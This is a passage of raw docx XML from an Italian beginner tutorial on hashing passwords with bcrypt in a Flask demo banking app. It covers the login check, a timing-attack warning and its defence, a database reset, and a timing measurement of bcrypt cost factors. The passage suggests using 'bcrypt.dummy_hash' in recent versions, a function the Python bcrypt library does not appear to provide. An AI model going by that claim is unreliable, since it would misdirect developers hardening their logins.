        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"VALUES (?, ?, ?, ?)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            (username, hash_pwd, ruolo, saldo)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.commit()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Modifica</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">login()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per verificare la password con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt.checkpw()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">invece di confrontare la stringa:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/login"</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login():</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username </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.form.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.form.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"password"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">""</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>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rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Recupera l'hash dell'utente</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT id, username, password, ruolo FROM utenti "</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"WHERE username = ?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, (username,))</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conn.close()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Verifica con bcrypt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> riga </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bcrypt.checkpw(password.encode(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utf-8"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                                   riga[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">].encode(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utf-8"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utente_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> riga[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> riga[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"ruolo"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> riga[</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redirect(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/dashboard"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"&lt;h3&gt;Credenziali errate&lt;/h3&gt;&lt;a href='/login'&gt;Riprova&lt;/a&gt;"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">""" ... (form invariato) ... """</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">⚠️</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Sottigliezza importante: timing attack.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il codice sopra ha un piccolo problema: se l’utente non esiste (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">riga</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">None</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">),</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt.checkpw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">non viene chiamato. La risposta è più veloce. Un attaccante può misurare il tempo di risposta e dedurre quali username esistono.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Difesa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">chiamare comunque</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt.checkpw</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con un hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">dummy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se l’utente non esiste, per uniformare i tempi. Oppure usare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt.dummy_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(nelle versioni recenti). Per il primo anno è sufficiente conoscere il problema.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="336"/>
    <w:bookmarkStart w:id="337" w:name="step-3-reset-del-database"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 3 — Reset del database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Cancella il vecchio database (le password vecchie sono in chiaro):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">del bancapiccola.db    # Windows</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">rm bancapiccola.db     # macOS/Linux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riavvia l’app:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">python app.py</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="337"/>
    <w:bookmarkStart w:id="338" w:name="step-4-verifica"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 4 — Verifica</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Apri DB Browser for SQLite, apri il nuovo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">bancapiccola.db</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, vai sulla tabella</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">utenti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Adesso vedi:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$2b$12$xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1000"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Per ogni utente.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Le password originali non sono più recuperabili dal database.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fai login con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario123</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Funziona: bcrypt verifica e accetta.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1128"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fai login con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">mario</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">password-sbagliata</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Rifiutato.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="338"/>
    <w:bookmarkStart w:id="339" w:name="X6ab82596628b69cf35ddd5bc69cb5bf372ce42c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 5 — Verifica della rallentamento intenzionale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Bcrypt è</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">deliberatamente lento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Misuralo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bcrypt, time</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">password </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">b"MioSegreto123!"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">inizio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> time.time()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hash_pwd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bcrypt.hashpw(password, bcrypt.gensalt(rounds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"Hash con cost 12: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inizio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:.3f}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> secondi"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">inizio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> time.time()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">hash_pwd </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> bcrypt.hashpw(password, bcrypt.gensalt(rounds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">print</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f"Hash con cost 14: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inizio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:.3f}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> secondi"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Output tipico (su un PC di fascia media):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Hash con cost 12: 0.250 secondi</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">Hash con cost 14: 1.020 secondi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sembra</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lento</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per te, è il punto. Significa che un attaccante con la GPU può fare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
